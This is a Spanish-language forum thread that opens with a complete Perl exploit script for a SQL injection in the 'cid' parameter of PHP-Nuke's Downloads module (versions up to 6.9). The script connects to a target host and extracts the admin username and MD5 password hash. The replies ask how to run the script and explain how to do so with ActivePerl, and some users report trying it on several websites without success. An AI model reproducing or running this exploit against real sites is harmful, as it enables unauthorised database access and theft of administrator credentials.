PHP-NUKE version <= 6.9 'cid' sql injection exploit (Perl)

Código:

#!/usr/bin/perl -w
use IO::Socket;

########################################
## THIS CODE PUBLIC NOW =))) ##
########################################
## __________ ___ ___ ##
## \______ \__ __ ______/ | \ ##
## | _/ | \/ ___/ _ \ ##
## | | \ | /\___ \\ / ##
## |____|_ /____//____ >\___|_ / ##
## \/ \/ \/ ##
########################################
## based on 'cid' sql injection vuln
## in Download module, more info about
## this vuln u can see here:
## http://rst.void.ru/texts/advisory10.htm
########################################
## work only on mysql version > 4.0
########################################
## tested on PHP-Nuke versions: 6.9, 6.0, 6.5
## C:\>r57phpnuke.pl 127.0.0.1 /phpnuke/ admin
##
## server : 127.0.0.1
## folder : /phpnuke/
## aid : admin
##
## [~] prepare to connect...
## [+] connected
## [~] prepare to send data...
## [+] success
## [~] wait for reply...
## [+] w00t...
## [+] USER: admin
## [+] MD5 HASH: 5f4dcc3b5aa765d61d8327deb882cf99
##
########################################

if (@ARGV < 3)
{
print "################################################################################\n";
print " r57nuke-cid.pl - PHP-NUKE 'cid' sql injection exploit\n";
print " by RusH security team // www.rsteam.ru , http://rst.void.ru\n";
print " coded by 1dt.w0lf // r00t\@rsteam.ru // 17.09.2003\n";
print "################################################################################\n";
print " Usage:\n";
print " r57nuke-cid.pl <host> </folder/> <aid>\n";
print "\n";
print " <host> - host for attack\n";
print " </folder/> - PHP-nuke folder ( /phpnuke/ , /nuke/ or / for no folder )\n";
print " <aid> - user aid , nick ( admin , blabla )\n";
print "################################################################################";
exit();
}

$server = $ARGV[0];
$folder = $ARGV[1];
$aid = $ARGV[2];

print "\n";
print "server : $server\n";
print "folder : $folder\n";
print "aid : $aid\n";
print "\n";
$success = 0;
$path_download = "modules.php?name=Downloads&d_op=viewdownload&cid=2%20UNION%20select%20counter,%20aid,%20pwd%20FROM%20nuke_authors%20--";
$GET = $folder . $path_download;
print "[~] prepare to connect...\n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] connect failed\n";
print "[+] connected\n";
print "[~] prepare to send data...\n";
print $socket "GET $GET HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Http-Referer: http://microsoft.com\n";
print $socket "User-Agent: Internet Explorer 6.0\n";
print $socket "Pragma: no-cache\n";
print $socket "Cache-Control: no-cache\n";
print $socket "Connection: close\n\n";
print "[+] success\n";
print "[~] wait for reply...\n";
while ($answer = <$socket>)
{
#print "$answer";
if ($answer=~/(&cid=)(\w)(\"><b>)($aid)(<\/b><\/a><\/font>)(.{0,20})(<font class=\"content\">)(.{32})(<\/font>)/)
{
$success = 1;
print "[+] w00t...\n";
print "[+] USER: $1 \n[+] MD5 HASH: $6\n";
}
}
if ($success == 0) { print "[-] exploit failed =(\n"; }

para que es ???????????????????????????
es que no entiendo el lenguage de esa website.
Se que es para sacar el password del admin de un server corriendo php nuke pero......................... cuales son vulnerables etc........

Citar

work only on mysql version > 4.0
########################################
## tested on PHP-Nuke versions: 6.9, 6.0, 6.5

si solo lees los titulos........

Hola muchachos, les comento yo tengo el ActivePerl, pero la verdad no se como usarlo ...

Para compilar el exploit, como tengo que hacer?

Gracias

Gracias maestro, ahora:
"Los que estan en perl (exploit.pl) se lanzan, tanto en msdos como en linux:

perl exploit.pl <parametros> <parametros>"

el exploit.pl lo tengo q colocar en alguna carpeta especial para que compile ? porque al ejecutar el ms-dos y tipear perl exploit.pl (en la carpeta del exploit) me da comando o nombre de arhivo....

hay algo q debo hacer antes?

Vamos a ver, vamos a ver....

Todo el codigo lo metes en un archivo llamado exploit.pl. Si kieres, primero lo creas con el bloc de notas, metes el codigo, y lo renombras a exploit.pl... lo pones en la carpeta que kieras, y desde msdos, lo lanzas con perl....

Si no te funciona, es porque tiene que ser lanzado obligatoriamente en linux.

Pero creo casi al 100% que te debe funcionar perfectamente con el Active Perl

Ya esta, lo que yo tenia era el source, pero ya esta.

Muchas gracias Rojodos

nose yo.. pero lo probe justo cuando sacaron el exploit y juraria q la injeccion esta mal xq no funcionaba.... en ninguno de los muchos q probe....

Hacer preguntas concretas, claras y aportando toda la documentación necesaria.
De lo contrario, no tendreis una respuesta clara.

Cita de: DEREK_X en 23 Diciembre 2003, 10:22

nose yo.. pero lo probe justo cuando sacaron el exploit y juraria q la injeccion esta mal xq no funcionaba.... en ninguno de los muchos q probe....

Lo probe en varias web y nada..

hard-h2o modding Foros de ayuda Yashira.org Videojuegos indetectables.net

Noticias Informatica Seguridad Informática ADSL Foros en español eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.